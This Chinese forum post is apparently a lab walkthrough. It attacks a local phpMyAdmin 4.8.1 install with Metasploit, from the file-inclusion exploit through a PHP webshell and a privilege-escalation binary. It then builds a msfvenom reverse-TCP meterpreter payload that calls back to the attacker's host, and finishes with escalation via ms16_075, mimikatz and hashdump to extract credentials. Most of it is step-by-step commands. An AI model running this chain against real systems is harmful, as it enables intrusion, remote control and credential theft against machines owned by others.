1、将phpstudy设置为系统服务
2、打开管理工具中的服务,进入Apache界面,进行用户设置。
记得将phpstudy/apache/logs进行用户权限设置。
再来查看phpstudy中网站地址。http://192.168.211.130/phpMyAdmin-4.8.1/
本地环境搭建完成。
1、打开msfconsole
2、打开phpmyadmin模块,选用第3个攻击模块(文件包含造成文件执行漏洞)
search phpmyadmin
3、输入options ,查看界面。填入目标IP地址、目标密码、目标所在文件
set password root
set targeturi /phpMyAdmin-4.8.1/
set rhosts 192.168.211.130
然后run执行。
4、发现攻击成功,进入meterpreter界面。
5、现在可以写入一个PHP一句话木马。
edit 321.php
进入写码界面,敲击键盘a就可以进入,写入一句话木马。
敲击键盘上的a
写完按键盘esc进行保存,在按shift和: 在输入wq就切换回meterpreter界面。
输入dir,发现一句话木马写入成功。
接着就可以连接蚁剑。
根据提权补丁,我们运用ms15-015x64.exe进行提权。再将它重命名改为111.exe
添加用户成功。
继续回到msf,还是运用msf提权。
6、因为前面的攻击连接不稳定,现在需要制作一个msf自己的木马文件,让目标来访问我们的机器(不知道这个算不算反弹shell)。
7、新建一个终端窗口,输入msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.211.132 lport=1234 -f exe > shell.exe
IP地址必须与本机一致
8、返回刚刚的终端窗口,将shell上传。
upload shell.exe
execute -H -f shell.exe
9、在新窗口,打开msfconsole
接着打开监听模块
use exploit/multi/handler
设置payload
payload需要与上面的保持一致。
set payload windows/x64/meterpreter/reverse_tcp
10、设置本地地址,端口
set lhost 192.168.211.132
set lport 1234
11、run跑起来,
接着返回刚刚的窗口,输入
execute -H -f shell.exe
创建会话
新建窗口的监听模块成功进入meterpreter界面。
12、将进程保存为session 1
background
13、打开msf中本地信息搜集模块
use post/multi/recon/local_exploit_suggester
14、设置session为1
set session 1
Run跑起来,得到4个可以攻击的模块,对它们进行一一实验,看哪个能攻击成功。
15、发现exploit/windows/local/ms16_075_reflection_juicy攻击成功.
use exploit/windows/local/ms16_075_reflection_juicy
设置session为1
Set session 1
输入getuid,发现得到管理员权限
16、接着加载猕猴桃模块
load mimikatz
在获取管理员密码
Kerberos
发现获得一串乱码。
17、输入ps,查看进程。有哪些在管理员权限下
18、调用412进程。
migrate 412
输入hashdump,对密码进行解密
再来查看管理员密码
Kerberos
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-劲夫 | 20.00 | 0 | 2021-10-29 17:05:04 | 活动奖励 |
Track-劲夫 | 40.00 | 0 | 2021-10-29 17:05:57 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.